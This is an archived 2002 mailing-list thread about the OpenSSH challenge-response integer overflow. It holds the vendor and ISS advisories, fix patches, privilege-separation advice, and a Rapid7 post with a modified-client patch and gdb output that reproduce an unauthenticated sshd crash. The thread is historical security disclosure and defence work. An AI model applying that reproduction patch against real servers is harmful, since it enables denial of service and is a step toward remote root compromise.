8647205 2002-06-24 19:35 -0700 /13 rader/ John Williams <jw@mksecure.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-25 21:55 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22811>
Ärende: OpenSSH vulnerability
------------------------------------------------------------
From: "John Williams" <jw@mksecure.com>
To: <bugtraq@securityfocus.com>
Message-ID: <000401c21bf1$099e41f0$1300000a@walter>
Just noticed this linked from freshmeat, didn't see it here yet.
Sounds bad.
http://www.debian.org/security/2002/dsa-134
--JW
(8647205) /John Williams <jw@mksecure.com>/(Ombruten)
8648385 2002-06-24 15:00 -0600 /88 rader/ Theo de Raadt <deraadt@cvs.openbsd.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-26 07:53 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: dsi@iss.net
Extern kopiemottagare: announce@openbsd.org
Extern kopiemottagare: misc@openbsd.org
Mottagare: Bugtraq (import) <22815>
Ärende: Upcoming OpenSSH vulnerability
------------------------------------------------------------
From: Theo de Raadt <deraadt@cvs.openbsd.org>
To: bugtraq@securityfocus.com
Cc: misc@openbsd.org
Message-ID: <200206242100.g5OL0BLJ019128@cvs.openbsd.org>
There is an upcoming OpenSSH vulnerability that we're working on with
ISS. Details will be published early next week.
However, I can say that when OpenSSH's sshd(8) is running with priv
seperation, the bug cannot be exploited.
OpenSSH 3.3p was released a few days ago, with various improvements
but in particular, it significantly improves the Linux and Solaris
support for priv sep. However, it is not yet perfect. Compression is
disabled on some systems, and the many varieties of PAM are causing
major headaches.
However, everyone should update to OpenSSH 3.3 immediately, and enable
priv seperation in their ssh daemons, by setting this in your
/etc/ssh/sshd_config file:
UsePrivilegeSeparation yes
Depending on what your system is, privsep may break some ssh
functionality. However, with privsep turned on, you are immune from
at least one remote hole. Understand?
3.3 does not contain a fix for this upcoming bug.
If priv seperation does not work on your operating system, you need to
work with your vendor so that we get patches to make it work on your
system. Our developers are swamped enough without trying to support
the myriad of PAM and other issues which exist in various systems.
You must call on your vendors to help us.
Basically, OpenSSH sshd(8) is something like 27000 lines of code. A
lot of that runs as root. But when UsePrivilegeSeparation is enabled,
the daemon splits into two parts. A part containing about 2500 lines
of code remains as root, and the rest of the code is shoved into a
chroot-jail without any privs. This makes the daemon less vulnerable
to attack.
We've been trying to warn vendors about 3.3 and the need for privsep,
but they really have not heeded our call for assistance. They have
basically ignored us. Some, like Alan Cox, even went further stating
that privsep was not being worked on because "Nobody provided any info
which proves the problem, and many people dont trust you theo" and
suggested I "might be feeding everyone a trojan" (I think I'll publish
that letter -- it is just so funny). HP's representative was
downright rude, but that is OK because Compaq is retiring him. Except
for Solar Designer, I think none of them has helped the OpenSSH
portable developers make privsep work better on their systems.
Apparently Solar Designer is the only person who understands the need
for this stuff.
So, if vendors would JUMP and get it working better, and send us
patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday
which supports these systems better. So send patches by Thursday
night please. Then on Tuesday or Wednesday the complete bug report
with patches (and exploits soon after I am sure) will hit BUGTRAQ.
Let me repeat: even if the bug exists in a privsep'd sshd, it is not
exploitable. Clearly we cannot yet publish what the bug is, or
provide anyone with the real patch, but we can try to get maximum
deployement of privsep, and therefore make it hurt less when the
problem is published.
So please push your vendor to get us maximally working privsep patches
as soon as possible!
We've given most vendors since Friday last week until Thursday to get
privsep working well for you so that when the announcement comes out
next week their customers are immunized. That is nearly a full week
(but they have already wasted a weekend and a Monday). Really I think
this is the best we can hope to do (this thing will eventually leak,
at which point the details will be published).
Customers can judge their vendors by how they respond to this issue.
OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away.
On OpenBSD privsep works flawlessly, and I have reports that is also
true on NetBSD. All other systems appear to have minor or major
weaknesses when this code is running.
(securityfocus postmaster; please post this through immediately, since
i have bcc'd over 30 other places..)
(8648385) /Theo de Raadt <deraadt@cvs.openbsd.org>/-
8651054 2002-06-26 16:42 +0200 /95 rader/ Markus Friedl <markus@openbsd.org>
Sänt av: henrik@edlund.org
Importerad: 2002-06-26 17:00 av Brevbäraren
Extern mottagare: openssh-unix-announce@mindrot.org
Externa svar till: openssh@openssh.com
Mottagare: Cracking erfarenhetsutbyte <14517>
Mottagare: SSH (Secure Shell -) erfarenhetsutbyte <1005>
Sänt: 2002-06-26 17:05
Sänt av Andreas Lange (Framtidsplanerar)
Markerad av 1 person.
Ärende: [openssh-unix-announce] OpenSSH Security Advisory (adv.iss)
------------------------------------------------------------
1. Versions affected:
All versions of OpenSSH's sshd between 2.9.9 and 3.3
contain an input validation error that can result in
an integer overflow and privilege escalation.
OpenSSH 3.4 and later are not affected.
OpenSSH 3.2 and later prevent privilege escalation
if UsePrivilegeSeparation is enabled in sshd_config.
OpenSSH 3.3 enables UsePrivilegeSeparation by
default.
Although OpenSSH 2.9 and earlier are not affected
upgrading to OpenSSH 3.4 is recommended, because
OpenSSH 3.4 adds checks for a class of potential bugs.
2. Impact:
This bug can be exploited remotely if
ChallengeResponseAuthentication is enabled in sshd_config.
Affected are at least systems supporting
s/key over SSH protocol version 2 (OpenBSD, FreeBSD
and NetBSD as well as other systems supporting
s/key with SSH). Exploitablitly of systems
using PAM in combination has not been verified.
3. Short-Term Solution:
Disable ChallengeResponseAuthentication in sshd_config.
or
Enable UsePrivilegeSeparation in sshd_config.
4. Solution:
Upgrade to OpenSSH 3.4 or apply the following patches.
5. Credits:
ISS.
Appendix:
A:
Index: auth2-chall.c
===================================================================
RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v
retrieving revision 1.18
diff -u -r1.18 auth2-chall.c
--- auth2-chall.c 19 Jun 2002 00:27:55 -0000 1.18
+++ auth2-chall.c 26 Jun 2002 09:37:03 -0000
@@ -256,6 +256,8 @@
authctxt->postponed = 0; /* reset */
nresp = packet_get_int();
+ if (nresp > 100)
+ fatal("input_userauth_info_response: nresp too big %u", nresp);
if (nresp > 0) {
response = xmalloc(nresp * sizeof(char*));
for (i = 0; i < nresp; i++)
B:
Index: auth2-pam.c
===================================================================
RCS file: /var/cvs/openssh/auth2-pam.c,v
retrieving revision 1.12
diff -u -r1.12 auth2-pam.c
--- auth2-pam.c 22 Jan 2002 12:43:13 -0000 1.12
+++ auth2-pam.c 26 Jun 2002 10:12:31 -0000
@@ -140,6 +140,15 @@
nresp = packet_get_int(); /* Number of responses. */
debug("got %d responses", nresp);
+
+ if (nresp != context_pam2.num_expected)
+ fatal("%s: Received incorrect number of responses "
+ "(expected %u, received %u)", __func__, nresp,
+ context_pam2.num_expected);
+
+ if (nresp > 100)
+ fatal("%s: too many replies", __func__);
+
for (i = 0; i < nresp; i++) {
int j = context_pam2.prompts[i];
_______________________________________________
openssh-unix-announce@mindrot.org mailing list
http://www.mindrot.org/mailman/listinfo/openssh-unix-announce
(8651054) /Markus Friedl <markus@openbsd.org>/------
Kommentar i text 8651076 av Nixon (remontado) (i röd zon)
Kommentar i text 8651101
Kommentar i text 8651117 av Peter Eriksson LYSATOR/IFM/iRoot
8651233 2002-06-26 16:40 +0200 /44 rader/ Markus Friedl <Markus_Friedl@genua.de>
Sänt av: henrik@edlund.org
Importerad: 2002-06-26 17:21 av Brevbäraren
Extern mottagare: openssh-unix-announce@mindrot.org
Externa svar till: openssh@openssh.com
Mottagare: Cracking erfarenhetsutbyte <14522>
Mottagare: SSH (Secure Shell -) erfarenhetsutbyte <1014>
Sänt: 2002-06-26 17:55
Sänt av Joel Rosdahl (25), Enea Epact
Ärende: [openssh-unix-announce] OpenSSH 3.4 released
------------------------------------------------------------
OpenSSH 3.4 has just been released. It will be available from the
mirrors listed at http://www.openssh.com/ shortly.
OpenSSH is a 100% complete SSH protocol version 1.3, 1.5 and 2.0
implementation and includes sftp client and server support.
We would like to thank the OpenSSH community for their continued
support and encouragement.
Changes since OpenSSH 3.3:
============================
Security Changes:
=================
All versions of OpenSSH's sshd between 2.9.9 and 3.3
contain an input validation error that can result in
an integer overflow and privilege escalation.
OpenSSH 3.4 fixes this bug.
In addition, OpenSSH 3.4 adds many checks to detect
invalid input and mitigate resource exhaustion attacks.
OpenSSH 3.2 and later prevent privilege escalation
if UsePrivilegeSeparation is enabled in sshd_config.
OpenSSH 3.3 enables UsePrivilegeSeparation by
default.
Reporting Bugs:
===============
- please read http://www.openssh.com/report.html
and http://bugzilla.mindrot.org/
OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de
Raadt, Kevin Steves, Damien Miller and Ben Lindstrom.
_______________________________________________
openssh-unix-announce@mindrot.org mailing list
http://www.mindrot.org/mailman/listinfo/openssh-unix-announce
(8651233) /Markus Friedl <Markus_Friedl@genua.de>/(Ombruten)
8651030 2002-06-26 09:56 -0400 /155 rader/ X-Force <xforce@iss.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-26 16:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22819>
Ärende: ISS Advisory: OpenSSH Remote Challenge Vulnerability
------------------------------------------------------------
From: X-Force <xforce@iss.net>
To: bugtraq@securityfocus.com
Message-ID: <200206261356.g5QDu7B10394@ra.iss.net>
-----BEGIN PGP SIGNED MESSAGE-----
Internet Security Systems Security Advisory
June 26, 2002
OpenSSH Remote Challenge Vulnerability
Synopsis:
ISS X-Force has discovered a serious vulnerability in the default
installation of OpenSSH on the OpenBSD operating system. OpenSSH is a
free version of the SSH (Secure Shell) communications suite and is
used as a secure replacement for protocols such as Telnet, Rlogin,
Rsh, and Ftp. OpenSSH employs end-to-end encryption (including all
passwords) and is resistant to network monitoring, eavesdropping, and
connection hijacking attacks. X-Force is aware of active exploit
development for this vulnerability.
Impact:
OpenBSD, FreeBSD-Current, and other OpenSSH implementations may be
vulnerable to a remote, superuser compromise.
Affected Versions:
OpenBSD 3.0
OpenBSD 3.1
FreeBSD-Current
OpenSSH 3.0-3.2.3
OpenSSH version 3.3 implements "privilege separation" which mitigates
the risk of a superuser compromise. Prior to the release of this
advisory, ISS and OpenBSD encouraged all OpenSSH users to upgrade to
version 3.3. Versions of FreeBSD-Current built between March 18, 2002
and June 23, 2002 are vulnerable to remote superuser compromise.
Privilege separation was implemented in FreeBSD-Current on June 23,
2002.
Note: OpenSSH is included in many operating system distributions,
networking equipment, and security appliances. Refer to the following
address for information about vendors that implement OpenSSH:
http://www.openssh.com/users.html
Description:
A vulnerability exists within the "challenge-response" authentication
mechanism in the OpenSSH daemon (sshd). This mechanism, part of the
SSH2 protocol, verifies a user's identity by generating a challenge
and forcing the user to supply a number of responses. It is possible
for a remote attacker to send a specially-crafted reply that triggers
an overflow. This can result in a remote denial of service attack on
the OpenSSH daemon or a complete remote compromise. The OpenSSH
daemon runs with superuser privilege, so remote attackers can gain
superuser access by exploiting this vulnerability.
OpenSSH supports the SKEY and BSD_AUTH authentication options. These
are compile-time options. At least one of these options must be
enabled before the OpenSSH binaries are compiled for the vulnerable
condition to be present. OpenBSD 3.0 and later is distributed with
BSD_AUTH enabled. The SKEY and BSD_AUTH options are not enabled by
default in many distributions. However, if these options are
explicitly enabled, that build of OpenSSH may be vulnerable.
Recommendations:
Internet Scanner X-Press Update 6.13 includes a check,
OpenSshRunning, to detect potentially vulnerable installations of
OpenSSH. XPU 6.13 is available from the ISS Download Center at:
http://www.iss.net/download. For questions about downloading and
installing this XPU, email support@iss.net.
ISS X-Force recommends that system administrators disable unused
OpenSSH authentication mechanisms. Administrators can remove this
vulnerability by disabling the Challenge-Response authentication
parameter within the OpenSSH daemon configuration file. This filename
and path is typically: /etc/ssh/sshd_config. To disable this
parameter, locate the corresponding line and change it to the line
below:
ChallengeResponseAuthentication no
The "sshd" process must be restarted for this change to take effect.
This workaround will permanently remove the vulnerability. X-Force
recommends that administrators upgrade to OpenSSH version 3.4
immediately. This version implements privilege separation, contains a
patch to block this vulnerability, and contains many additional pro-
active security fixes. Privilege separation was designed to limit
exposure to known and unknown vulnerabilities. Visit
http://www.openssh.com for more information.
Additional Information:
ISS X-Force and Black Hat consulting will host a presentation titled,
"Professional Source Code Auditing" at Black Hat Briefings USA
2002. The presentation will explore advanced source code auditing
techniques as well as secure development best-practices. Please refer
to http://www.blackhat.com and
http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd
for more information.
Credits:
The vulnerability described in this advisory was discovered and
researched by Mark Dowd of the ISS X-Force. ISS would like to thank
Theo de Raadt of the OpenBSD Project for his assistance with this
advisory.
______
About Internet Security Systems (ISS) Founded in 1994, Internet
Security Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader
in software and services that protect critical online resources from
an ever-changing spectrum of threats and misuse. Internet Security
Systems is headquartered in Atlanta, GA, with additional operations
throughout the Americas, Asia, Australia, Europe and the Middle East.
Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of
this document. It is not to be edited or altered in any way without
the express written consent of the Internet Security Systems
X-Force. If you wish to reprint the whole or any part of this
document in any other medium excluding electronic media, please email
xforce@iss.net for permission.
Disclaimer: The information within this paper may change without
notice. Use of this information constitutes acceptance for use in an
AS IS condition. There are NO warranties, implied or otherwise, with
regard to this information or its use. Any use of this information is
at the user's risk. In no event shall the author/distributor
(Internet Security Systems X-Force) be held liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information.
X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server, as well as at http://www.iss.net/security_center/sensitive.php
Please send suggestions, updates, and comments to: X-Force
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBPRnHMDRfJiV99eG9AQHc3wQApUjGfFHFybhfo8vCqlNZ63eEu7ehQyiF
lrufj/P7q2cFY/VLICepeDtLhP52bcchNm3WTlaIT3wWLnZzObvgtabHOIax0Z7t
oob/Li9+NTB2abwvQiFoX37DPmbhFJ6p1UxgfvVQ6+77nPZse/ID+EFSwLVGL45t
ak0sHKrvD0o=
=MfYf
-----END PGP SIGNATURE-----
(8651030) /X-Force <xforce@iss.net>/------(Ombruten)
Kommentar i text 8651051
Kommentar i text 8651198
Kommentar i text 8651439
8651731 2002-06-25 22:53 +0400 /82 rader/ Solar Designer <solar@openwall.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-26 19:47 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: announce@lists.openwall.com
Extern kopiemottagare: owl-users@lists.openwall.com
Extern kopiemottagare: lwn@lwn.net
Extern kopiemottagare: Theo de Raadt <deraadt@cvs.openbsd.org>
Mottagare: Bugtraq (import) <22822>
Ärende: Re: Upcoming OpenSSH vulnerability
------------------------------------------------------------
From: Solar Designer <solar@openwall.com>
To: bugtraq@securityfocus.com
Cc: announce@lists.openwall.com, owl-users@lists.openwall.com,
lwn@lwn.net, Theo de Raadt <deraadt@cvs.openbsd.org>
Message-ID: <20020625225304.A4307@openwall.com>
On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote:
> There is an upcoming OpenSSH vulnerability that we're working on with
> ISS. Details will be published early next week.
>
> However, I can say that when OpenSSH's sshd(8) is running with priv
> seperation, the bug cannot be exploited.
>
> OpenSSH 3.3p was released a few days ago, with various improvements
> but in particular, it significantly improves the Linux and Solaris
> support for priv sep. However, it is not yet perfect. Compression is
> disabled on some systems, and the many varieties of PAM are causing
> major headaches.
>
> However, everyone should update to OpenSSH 3.3 immediately, and enable
> priv seperation in their ssh daemons, by setting this in your
> /etc/ssh/sshd_config file:
>
> UsePrivilegeSeparation yes
Owl-current has been updated to include OpenSSH 3.3p1 with privilege
separation enabled (and a patch to make that work on Linux 2.2 kernels
which we continue to support). The updated source tree and packages
went to the FTP mirrors by Monday.
This stuff is, however, still being hacked on because of certain
minor functionality problems that remain in this rushed release.
Expect further updates in the following days and next week.
It is strongly recommended that Openwall GNU/*/Linux (Owl) users
update first to these 3.3p1-based privilege separated update packages
and then to ones based on the upcoming OpenSSH releases.
The details of the changes we apply will be documented in change logs
for the OpenSSH package as well as in the system-wide change logs
under Owl/doc/CHANGES in the native tree, also available via the web:
http://www.openwall.com/Owl/CHANGES.shtml
The SSH server used to be the only Internet service provided with Owl
that didn't utilize privilege separation approaches. Now, thanks to
the excellent work by Niels Provos, we are able to provide a system
where all the Internet services are provided with privilege-separated
implementations. That includes FTP, SMTP, POP3, Telnet, and now SSH.
Those curious of how this all works may see our diagrams of the FTP,
POP3, and Telnet servers in our CanSecWest/core02 / NordU2002 slides:
http://www.openwall.com/presentations/core02-owl-html+images/
The FTP server is Chris Evans' vsftpd. The POP3 is popa3d. And the
Telnet is a port from OpenBSD with privilege separation introduced in
a way similar to what Chris Evans did in his patches to NetKit's (but
the code is different). In all cases, the processes which talk to the
remote client are running as a dedicated pseudo-user (different for
each service) and chroot'ed to an empty directory (/var/empty).
For the privilege-separated OpenSSH sshd, please refer to Niels
Provos' web page on the topic:
http://www.citi.umich.edu/u/provos/ssh/privsep.html
The SMTP server is Postfix, with many of its components running in a
chroot jail:
http://www.postfix.org/security.html
http://www.postfix.org/big-picture.html
In fact, the checking of file accesses performed by Postfix that we
did as a part of maintenance of the package on Owl has contributed
to making Postfix's privilege separation more solid (starting with the
20011217 snapshot).
--
/sd
(8651731) /Solar Designer <solar@openwall.com>/(Ombruten)
8657897 2002-06-27 13:15 -0400 /143 rader/ Joe Testa <jtesta@rapid7.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-28 01:01 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22857>
Ärende: How to reproduce OpenSSH Overflow.
------------------------------------------------------------
From: Joe Testa <jtesta@rapid7.com>
To: bugtraq@securityfocus.com
Message-ID: <3D1B4820.10202@rapid7.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The R7 team did a little investigating into one of the OpenSSH
vulnerabilities.
The following are instructions on how to reproduce a segmentation
violation in sshd (v3.2.3p1):
0.) Compile with PAM and S/KEY support.
1.) Apply the following patch to the ssh client:
- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002
+++ sshconnect2.c Thu Jun 27 11:56:27 2002
@@ -866,6 +866,7 @@
xfree(lang);
num_prompts = packet_get_int();
+ num_prompts = 2;
/*
* Begin to build info response packet based on prompts requested.
* We commit to providing the correct number of responses, so if
@@ -877,15 +878,16 @@
debug2("input_userauth_info_req: num_prompts %d", num_prompts);
for (i = 0; i < num_prompts; i++) {
+ if ( i == 0 ) {
prompt = packet_get_string(NULL);
echo = packet_get_char();
response = read_passphrase(prompt, echo ? RP_ECHO : 0);
- -
+ }
packet_put_cstring(response);
- - memset(response, 0, strlen(response));
+ /*memset(response, 0, strlen(response));
xfree(response);
- - xfree(prompt);
+ xfree(prompt);*/
}
packet_check_eom(); /* done with parsing incoming message. */
2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.
3.) Connect to sshd using the modified client.
Note: valid credentials are not required.
On the server side, you'll see:
[root@wonderland hi_chad]# gdb /usr/sbin/sshd GNU gdb Red Hat Linux
7.x (5.0rh-15) (MI_OUT) Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details. This GDB was configured as "i386-redhat-linux"... (no
debugging symbols found)... (gdb) run -d Starting program:
/usr/sbin/sshd -d debug1: sshd version OpenSSH_3.2.3p1 debug1:
private host key: #0 type 0 RSA1 debug1: read PEM private key done:
type RSA debug1: private host key: #1 type 1 RSA debug1: read PEM
private key done: type DSA debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol debug1: Bind to port
22 on 0.0.0.0. Server listening on 0.0.0.0 port 22. Generating 768
bit RSA key. RSA key generation complete. debug1: Server will not
fork when running in debugging mode. Connection from 127.0.0.1 port
33208 debug1: Client protocol version 2.0; client software version
OpenSSH_3.2.3p1 debug1: match: OpenSSH_3.2.3p1 pat OpenSSH* Enabling
compatibility mode for protocol 2.0 debug1: Local version string
SSH-1.99-OpenSSH_3.2.3p1 debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none debug1: kex:
server->client aes128-cbc hmac-md5 none debug1:
SSH2_MSG_KEX_DH_GEX_REQUEST received debug1:
SSH2_MSG_KEX_DH_GEX_GROUP sent debug1: dh_gen_key: priv key bits set:
124/256 debug1: bits set: 1626/3191 debug1: expecting
SSH2_MSG_KEX_DH_GEX_INIT debug1: bits set: 1597/3191 debug1:
SSH2_MSG_KEX_DH_GEX_REPLY sent debug1: kex_derive_keys debug1:
newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for
SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS
received debug1: KEX done debug1: userauth-request for user jdog
service ssh-connection method none debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog" debug1: PAM setting
rhost to "localhost.localdomain" Failed none for jdog from 127.0.0.1
port 33208 ssh2 debug1: userauth-request for user jdog service
ssh-connection method keyboard-interactive debug1: attempt 1
failures 1 debug1: keyboard-interactive devs debug1: auth2_challenge:
user=jdog devs= debug1: kbdint_alloc: devices 'skey' debug1:
auth2_challenge_start: trying authentication method 'skey' debug1:
got 2 responses (no debugging symbols found)... Program received
signal SIGSEGV, Segmentation fault. 0x08053822 in strcpy () (gdb)
Comments are much appreciated.
- Joe
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE9G0deZbL130sRBrQRAlHeAJ9ssfwYFs0SFdCwi4WuvGwZnwhYZgCggCE9
IYbUZtugGNYO5YggZ+izyFI=
=et0x
-----END PGP SIGNATURE-----
(8657897) /Joe Testa <jtesta@rapid7.com>/-(Ombruten)